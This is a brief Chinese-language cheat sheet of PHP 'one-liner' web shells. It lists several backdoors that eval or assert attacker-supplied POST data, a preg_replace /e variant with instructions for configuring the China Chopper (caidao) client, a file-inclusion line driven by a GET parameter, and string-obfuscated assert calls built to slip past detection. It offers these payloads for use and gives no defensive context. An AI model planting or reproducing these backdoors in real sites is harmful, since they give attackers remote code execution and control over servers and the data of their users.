### php一句话

* <?php eval($_POST[sb]);?>
* <?php @eval($_POST[sb]);?>
* <?php assert($_POST[sb]);?>
* <?$_POST['sa']($_POST['sb']);?>
* <?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
* <?php @preg_replace("/[email]/e",$_POST['h'],"error"); ?>
　 //使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
　 <O>h=@eval($_POST[c]);</O>
* <script language="php">@eval($_POST[sb])</script>
* $filename=$_GET['xbid'];
   include ($filename);
* <?php $c='ass'.'ert';${c}($_POST[4]);?>
* <?php $k = str_replace("8","","a8s88s8e8r88t");$k($_POST["8"]); ?>
